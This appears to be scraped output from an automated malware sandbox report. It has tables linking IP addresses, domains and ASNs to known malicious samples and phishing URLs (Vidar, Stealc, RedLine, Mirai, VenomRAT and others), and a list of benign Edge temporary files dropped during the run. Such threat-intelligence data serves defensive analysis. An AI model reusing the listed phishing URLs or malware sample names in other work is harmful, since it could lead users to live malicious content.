                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    162.159.61.3f38186770bffa4a12a7170942b9c0d71ac736142924da24a.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                      thUKanu6GD.lnkGet hashmaliciousHTMLPhisher, MalLnkBrowse
                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                          ADFoyxP.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                            desaremix.exeGet hashmaliciousKillMBRBrowse
                                                                                                                                                                                                                              https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                ATTACH - kotak.com.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    ATTACH - kotak.com.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      23.44.201.37vXn4pan2US.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            2.22.242.105file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                              ADFoyxP.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                b9173c7c-fe8a-41d4-3f0c-543a04cca5d6.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                  q3na5Mc.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    ESVoO7ywn5.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                      SecuriteInfo.com.Trojan.Inject5.17530.4675.11921.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        ynBVHwu6gx.exeGet hashmaliciousPureLog Stealer, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                          dwpk5JGAxF.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            CheatEngine75.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              52.182.143.2142025_Simplified_Tips_to_Stay_on_Track.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                Message_3410710_2.emlGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                  1737072166-104528-13339-8488-1.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    https://9cjl.enestiveryal.ru/lodfnqw/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      vMRlWtVCEN.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                        8CwKupnahl.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                            https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?e=wqutC4Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              http://learnthelanguage.nl/?wptouch_switch=desktop&redirect=http://basinindustriesinc.comGet hashmaliciousHTMLPhisherBrowse

                                                                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                a416.dscd.akamai.netthUKanu6GD.lnkGet hashmaliciousHTMLPhisher, MalLnkBrowse
                                                                                                                                                                                                                                                                                • 2.22.242.11
                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                • 2.22.242.105
                                                                                                                                                                                                                                                                                LtCPevm69G.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                • 2.22.242.105
                                                                                                                                                                                                                                                                                ADFoyxP.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                                                • 2.22.242.105
                                                                                                                                                                                                                                                                                https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                • 2.22.242.11
                                                                                                                                                                                                                                                                                https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 2.22.242.11
                                                                                                                                                                                                                                                                                q3na5Mc.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                • 95.101.54.115
                                                                                                                                                                                                                                                                                09.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                • 2.22.242.11
                                                                                                                                                                                                                                                                                95.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                • 2.22.242.11
                                                                                                                                                                                                                                                                                chrome.cloudflare-dns.comf38186770bffa4a12a7170942b9c0d71ac736142924da24a.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                                thUKanu6GD.lnkGet hashmaliciousHTMLPhisher, MalLnkBrowse
                                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                ADFoyxP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                ADFoyxP.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                desaremix.exeGet hashmaliciousKillMBRBrowse
                                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                                https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                                ATTACH - kotak.com.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                                a-0003.a-msedge.netstart.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                jki-dragon-release-online-setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                LtCPevm69G.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                ADFoyxP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                ADFoyxP.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                SUPPLY ORDERS 934784.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                wecreatedbestthingswithbestwomenforgive.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 204.79.197.203

                                                                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUSrandom.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                                                                                                                                • 13.92.180.205
                                                                                                                                                                                                                                                                                sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                • 20.9.165.211
                                                                                                                                                                                                                                                                                arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                • 22.220.177.215
                                                                                                                                                                                                                                                                                m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                • 20.116.102.223
                                                                                                                                                                                                                                                                                mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                • 22.36.149.105
                                                                                                                                                                                                                                                                                spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                • 20.170.188.24
                                                                                                                                                                                                                                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                • 20.198.14.175
                                                                                                                                                                                                                                                                                ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                • 22.157.162.64
                                                                                                                                                                                                                                                                                x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                • 20.81.13.225
                                                                                                                                                                                                                                                                                CLOUDFLARENETUSWave Executor 4.1.3.2_original.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                                                                                • 162.159.134.234
                                                                                                                                                                                                                                                                                RoLua.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                                                                                • 162.159.136.234
                                                                                                                                                                                                                                                                                hello.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                                                                                • 162.159.133.234
                                                                                                                                                                                                                                                                                Wave Executor 4.1.3.2_original.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                                                                                • 162.159.133.234
                                                                                                                                                                                                                                                                                nitrogenerator.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                                                                                • 162.159.130.234
                                                                                                                                                                                                                                                                                RoLua.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                                                                                • 162.159.135.234
                                                                                                                                                                                                                                                                                hello.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                                                                                • 162.159.134.234
                                                                                                                                                                                                                                                                                nitrogenerator.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                                                                                • 162.159.136.234
                                                                                                                                                                                                                                                                                SecuriteInfo.com.Variant.Lazy.407549.28690.28181.exeGet hashmaliciousSalat StealerBrowse
                                                                                                                                                                                                                                                                                • 104.21.84.111
                                                                                                                                                                                                                                                                                AKAMAI-ASN1EUsh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                • 23.63.69.82
                                                                                                                                                                                                                                                                                arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                • 23.7.208.86
                                                                                                                                                                                                                                                                                spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                • 23.197.137.104
                                                                                                                                                                                                                                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                • 23.200.79.255
                                                                                                                                                                                                                                                                                combined.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 23.32.3.56
                                                                                                                                                                                                                                                                                Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msgGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                                • 2.16.238.158
                                                                                                                                                                                                                                                                                Play_Voicemail_Transcription._(387.KB).svgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                • 95.101.182.112
                                                                                                                                                                                                                                                                                thUKanu6GD.lnkGet hashmaliciousHTMLPhisher, MalLnkBrowse
                                                                                                                                                                                                                                                                                • 2.22.242.11
                                                                                                                                                                                                                                                                                2_DemonstrateExplain.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 2.22.242.139
                                                                                                                                                                                                                                                                                AKAMAI-ASN1EUsh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                • 23.63.69.82
                                                                                                                                                                                                                                                                                arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                • 23.7.208.86
                                                                                                                                                                                                                                                                                spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                • 23.197.137.104
                                                                                                                                                                                                                                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                • 23.200.79.255
                                                                                                                                                                                                                                                                                combined.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 23.32.3.56
                                                                                                                                                                                                                                                                                Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msgGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                                • 2.16.238.158
                                                                                                                                                                                                                                                                                Play_Voicemail_Transcription._(387.KB).svgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                • 95.101.182.112
                                                                                                                                                                                                                                                                                thUKanu6GD.lnkGet hashmaliciousHTMLPhisher, MalLnkBrowse
                                                                                                                                                                                                                                                                                • 2.22.242.11
                                                                                                                                                                                                                                                                                2_DemonstrateExplain.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 2.22.242.139

                                                                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\0a756be5-7bd7-4a04-91bb-cd44bb0bd4ad.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):9258
                                                                                                                                                                                                                                                                                Entropy (8bit):5.597424977268221
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:RXqsNk5hvafxHQBYOsih/cIyURLl8Rotoes2neBZ2Vvl8xp66JkHyBKe4WJkechg:IsNwhWHQTViRU0ZPxpnqHylkegkj57
                                                                                                                                                                                                                                                                                MD5:D0BC6A604DD875EAB8F1351AC31045B5
                                                                                                                                                                                                                                                                                SHA1:D60E317E64D36785A17FBF4D744A5A0461DA66D2
                                                                                                                                                                                                                                                                                SHA-256:03135D9FBF2AD5D6D9A9F7BFA14CF726F356E07286347D51FD98E7F06169EC51
                                                                                                                                                                                                                                                                                SHA-512:2F5746AC9E4EED4A2902F0012C8D5FDC8E24C03D3AB9A291E29C4B9BA0F40CAC5BE18A2DF0D8F47F794D569FC99E21C0FF37DF3A6AD709FDBCE9B9D5FD42EB33
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"apps_count_check_time":"13385951549626514","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sidebar":{"upsell_trigger_count":1},"fire_local_softlanding_notification":false,"fre":{"has_first_v

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\16489f5d-e9e4-4abd-9862-d93fb2b5887c.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8159
                                                                                                                                                                                                                                                                                Entropy (8bit):5.481289474498657
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:RXqsNk5hvafxHQBYOsih/cIyURLl8Rotoes2neBZ2VvlIkNZjOe4WJkecq1vbJpr:IsNwhWHQTViRU0Z2Xj/ke9j57
                                                                                                                                                                                                                                                                                MD5:4C633A6521853B00BBB017E4371FB603
                                                                                                                                                                                                                                                                                SHA1:B76B27511244921CEA65CC9FDA49C0E0E40489F1
                                                                                                                                                                                                                                                                                SHA-256:F4035640D0EE0212652988650296608F8E8F9FF3FC57CDAE6C8C0CBF95E8F24D
                                                                                                                                                                                                                                                                                SHA-512:AB0A07D7AEB8644BCA93673568A5D982B4F7D39B42FB7728C61E7E98FB9D4293DC6950AF3B161538E97F10135882854382CCDCC9486766C4F2656A68EB3904CC
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"apps_count_check_time":"13385951549626514","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sidebar":{"upsell_trigger_count":1},"fire_local_softlanding_notification":false,"fre":{"has_first_v

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1bfbf2ed-24a7-4f7e-8c7d-79a6eded22eb.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                Entropy (8bit):5.7944174570897875
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfxHQBYx5ih/cI9URLl8Roto+MFVvlwhse4IbONIeTC6XQS0qGqk+Z4uj+rE:akJHQveiRUxhc6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                MD5:5ED639CBFBC33F103D13E54A5810F343
                                                                                                                                                                                                                                                                                SHA1:C48B4CFA4D7D63FCC2850E774572C1EEEDF1E37B
                                                                                                                                                                                                                                                                                SHA-256:9FB574A97B335A5F220F659B6630F45CA132A1A580AF8A71D38678C7D8F768EE
                                                                                                                                                                                                                                                                                SHA-512:2AC40645901B44B002CA629B2809C26F4105E4EE43602702FF56D536F5B12E35BE8D56F8F36D063B45B8E7FC828FAB87C4B79DC06B4CBCFDA6B80ACD5997F07C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACfJtKmBjOatQCTdGyHFgDW8nDJ1h65xGLuMZaXVuWXwQAAAAA

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2ab46ae5-a191-4f11-a19f-c31d683615e5.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):22711
                                                                                                                                                                                                                                                                                Entropy (8bit):6.048058127934138
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:vtMkaMJH2m0engiVKzhSW3BLntNqVsNwhAhsqezE7DLjoksp3SY:lMkbJ6eg6KzhXRLtkV1usqezgDXott
                                                                                                                                                                                                                                                                                MD5:EE07CFABDA47732F5A2E09456479D924
                                                                                                                                                                                                                                                                                SHA1:44EABC5FEB8323433F067444F8291C48462922D9
                                                                                                                                                                                                                                                                                SHA-256:0786300C848F403E93EEE350E97F06CF30BD8DF936AE6A23EEC24004153A239A
                                                                                                                                                                                                                                                                                SHA-512:718089592D436CD7EC4AC27FC6BA1C122D3EDE1CE97D9615D8946ED72FE1040AF9AC986694437C7D9ADE0AA4CEC3AB034E2DD69C5C1067BBCF31C3D767B804E3
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13385951549626514","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\39c88e3a-05fc-4e57-bb5d-8b0eac3ebe48.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8232
                                                                                                                                                                                                                                                                                Entropy (8bit):5.488756906978655
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:RXqsNk5hvafxHQBYOsih/cIyURLl8Rotoes2neBZ2VvlIk2Zjwe4WJkecq1vbJpY:IsNwhWHQTViRU0Z22jZke9j5o
                                                                                                                                                                                                                                                                                MD5:D4BCFE8FB81B0E3C1F539BC4D7A85334
                                                                                                                                                                                                                                                                                SHA1:C7D89E22B1856714DF538C3950A1F4FBE4E0DF69
                                                                                                                                                                                                                                                                                SHA-256:5F9C89AB8345D45D056DD8CE3E6AE3A20FD5DE7728D4F190BA0A622D7AC07284
                                                                                                                                                                                                                                                                                SHA-512:0CDB326C691AFF032C37B63B4578A27AF2AA320D20F0EBC0745311B91C1F3CFE33E6CC7AB812745710F11C54A9D8EB4EE6E44B1842805848974B4479C1553B8A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"apps_count_check_time":"13385951549626514","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sidebar":{"upsell_trigger_count":1},"fire_local_softlanding_notification":false,"fre":{"has_first_v

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\518dd118-2bf5-4b26-b090-28909763c7e2.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):24839
                                                                                                                                                                                                                                                                                Entropy (8bit):6.032792408944549
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:lMkbJ6eg6KzhXRLtkv1ulsjYqezgDXott:lMk16zRRSv14Wot
                                                                                                                                                                                                                                                                                MD5:D62349F9D77C11019B89A3EFAF111961
                                                                                                                                                                                                                                                                                SHA1:D897B9E260D56EEA6B6D0C691B6A1BC9C2EE1217
                                                                                                                                                                                                                                                                                SHA-256:13D4BE47669ADFC84EA10D45F1F96E1CBA050B667A0FBCA3EBBE862605D960EC
                                                                                                                                                                                                                                                                                SHA-512:1936A6265BD2469885D3717FD703A7EA87C58B495B9E867362524AA4AF98E2E16E63866973226DE6310B97B96BAD3527C7CB0CCB184E06486864891DF48845FA
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13385951549626514","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\574dd840-f38c-4515-bf28-85980a20762b.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
